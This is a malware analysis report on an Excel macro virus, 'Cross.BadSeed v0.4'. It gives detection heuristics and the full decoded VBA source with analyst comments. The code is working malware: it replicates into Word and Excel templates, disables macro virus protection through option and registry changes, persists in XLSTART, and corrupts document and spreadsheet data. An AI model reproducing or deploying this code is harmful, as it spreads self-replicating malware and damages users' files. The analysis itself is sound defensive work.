Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318e60cd16c69498…

MALICIOUS

Office (OLE)

29.5 KB Created: 1998-12-08 08:08:44 Authoring application: Microsoft Excel First seen: 2015-10-13
MD5: bff469bbde705cc467bfb56a333bd2b0 SHA-1: 1d638fd523609fe5b03d81508c8874e7a642499e SHA-256: 318e60cd16c6949882143f025e880958f8f98c0e8321a0f9a1eb5c4683c753fa
Risk score: 322

Heuristics 7

  • ClamAV: Doc.Trojan.Hopper-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-7
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    The macro calls CreateObject to instantiate an external COM automation object
    Matched line in script
            Set xlApp = CreateObject("Excel.Application")
  • GetObject call high OLE_VBA_GETOBJ
    The macro calls GetObject to attach to an already-running COM automation object
    Matched line in script
            Set WordObj = GetObject(, "Word.Application")
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
                xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm — In document text (OLE body)
    • http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6397 bytes
SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0
Detection
ClamAV: Doc.Trojan.Hopper-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
' Module header exported from the ThisWorkbook component of the Excel sample.
' The first code line above ('<!--1nternal-->') is the infection marker: each
' replication routine below reads Lines(1, 1) of a target code module and only
' copies itself in when that marker is absent. The marker therefore doubles as
' an indicator for hunting infected Normal templates and XLSTART workbooks.
' InRoutine is the re-entrancy guard consulted by Workbook_Deactivate.
Private Sub Document_Close()
    ' Word-side handler: Document_Close is a Word document event, although this
    ' module is the Excel ThisWorkbook component. NOTE(review): presumably only
    ' effective after the code has been copied into Word's Normal template /
    ' ThisDocument by the routines in this file — confirm dynamically.
    On Error Resume Next   ' every runtime error below is swallowed (e.g. when not running under Word)
    ' Stage 1 – weaken Word safeguards: silent Normal-template saves, no
    ' conversion prompt, and the built-in macro virus warning switched off
    ' (the line flagged by OLE_VBA_MACRO_VIRUS_REPLICATION).
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    ' Stage 2 – VBE object model access (VBProject.VBComponents ... CodeModule)
    ' from document code: the self-replication primitive. NT = global template
    ' module, AD = active document module.
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    ' Infect the Normal template from the active document when the marker is absent.
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        ' Stage 3 – cross-application hop into Excel via COM automation
        ' (OLE_VBA_CREATEOBJ). Persistence target is "Book1." in the XLSTART
        ' folder (OLE_VBA_XLSTART_PERSISTENCE); skipped if it already exists.
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            ' System.PrivateProfileString with an empty file name writes to the
            ' registry; both writes blank the Excel 8.0 "Options6" value.
            ' NOTE(review): the report classes this as AV/macro-warning tampering —
            ' the exact meaning of Options6 is not established by this code.
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            ' Create the startup workbook, inject the (now infected) Normal
            ' template code into its ThisWorkbook module, and save it.
            xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
            xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            xlApp.Workbooks("Book1.").Close SaveChanges:=True
        End If
        xlApp.Application.Quit
    End If
    ' Reverse direction: infect the active document from the Normal template.
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    ' Stage 4 – date-gated payloads. In VBA "Case 15 And (cond)" is a bitwise
    ' And on Integers (True = -1): it yields 15 when cond is True and 0 when
    ' False, and Day(Now) is never 0, so each arm fires only on that day of
    ' the month and only when the random draw hits.
    Select Case Day(Now)
        Case 15 And (Int((10 * Rnd) + 1) = 1)
            ' Opens the embedded URL reported under EMBEDDED_URL in a new window.
            ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
        Case 1 And (Int((10 * Rnd) + 1) = 1)
            ' Document tampering: every "I" character becomes "1".
            For i = 1 To ActiveDocument.Characters.Count
                If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
            Next
        Case 5 And (Int((10 * Rnd) + 1) = 1)
            ' Document tampering: every word "not" is deleted.
            For i = 1 To ActiveDocument.Words.Count
                If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
            Next
        Case 10 And (Int((15 * Rnd) + 1) = 1)
            ' Office Assistant balloon carrying the author credits.
            With Assistant.NewBalloon
                .Heading = "Cross.BadSeed v0.4"
                .Text = "Programmer:        1nternal" + Chr(13) + "Class Infection:    VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept:  VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
                .Show
            End With
        Case 20 And (Int((5 * Rnd) + 1) = 1)
            ' Visible indicator: the status bar string is a usable detection string.
            Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
    End Select
End Sub
Private Sub Workbook_Deactivate()
    ' Excel-side handler, run whenever this workbook loses activation.
    On Error Resume Next   ' all failures (missing Word, locked VBProject, ...) are silently ignored
    ' Replication runs only while "Book1." is absent from XLSTART and the guard
    ' is clear; InRoutine is never reset here, so it is a one-shot per session.
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        ' Attach to a running Word (OLE_VBA_GETOBJ); otherwise start one and
        ' remember (Quit, an undeclared Variant) to close it afterwards.
        ' NOTE(review): if GetObject fails WordObj is Nothing and the string
        ' comparison itself errors; whether the fallback branch is entered then
        ' depends on Resume Next semantics — confirm dynamically.
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            Quit = True
        End If
        ' Cross-application hop into Word's global template via the VBE object
        ' model (OLE_VBA_MACRO_VIRUS_REPLICATION); skipped if already marked.
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
        If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
            WordObj.Options.SaveNormalPrompt = False
            ' Writes a temporary DisableAV sub into Normal.dot, executes it with
            ' WordObj.Run, then replaces it with this workbook's own module text.
            ' The sub performs the same two registry writes as Document_Close
            ' (blanking Excel 8.0 "Options6"); it is the Excel-side equivalent of
            ' the macro-warning tampering, run under Word because Excel has no
            ' System.PrivateProfileString.
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
            WordObj.Run "Normal.ThisDocument.DisableAV"
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
        Set NT = Nothing
        If Quit = True Then WordObj.Application.Quit
        ' Persistence: create the XLSTART workbook (OLE_VBA_XLSTART_PERSISTENCE)
        ' so it auto-loads on every Excel start; its module is infected by the
        ' open-workbook loop below.
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
        Workbooks("Book1.").Close SaveChanges:=True
    End If
    ' Infect every open workbook whose ThisWorkbook module lacks the marker.
    ' Unlike the Word path this prepends (InsertLines 1) without deleting the
    ' existing module text, so the host's original code is preserved below it.
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
    ' Date-gated payloads, never run against the startup workbook itself.
    ' Same "Case N And cond" bitwise gating as in Document_Close.
    If ActiveWorkbook.Name <> "Book1." Then
        Select Case Day(Now)
            Case 1 And Int((Rnd * 10) + 1) = 1
                ' Adds ten cell comments at random positions (visible artefact).
                For i = 1 To 10
                    ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.4"
                Next
            Case 10 And Int((Rnd * 3) + 1) = 1
                ' Silent data corruption: 5 random columns, 30 random row-pair
                ' swaps each — integrity impact that AV signatures will not undo.
                For f = 1 To 5
                    CellCol = Int(Rnd * 15) + 2
                    For i = 1 To 30
                        Row1 = Int(Rnd * 200) + 10
                        Row2 = Int(Rnd * 200) + 10
                        TempVal = ActiveSheet.Cells(Row1, CellCol)
                        ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
                        ActiveSheet.Cells(Row2, CellCol) = TempVal
                    Next
                Next
            Case 15
                ' Assigns an undeclared local Variant only; no workbook property
                ' is touched here. NOTE(review): presumably intended to set the
                ' document author — has no effect as written.
                Author = "1nternal"
            Case 20 And Int((Rnd * 5) + 1) = 1
                ' Visible indicator: the status bar string is a usable detection string.
                Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
        End Select
    End If
End Sub

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Exported header of the Sheet3 worksheet component; no procedures follow it
' within this preview, so the replication and payload logic lives entirely in
' ThisWorkbook above.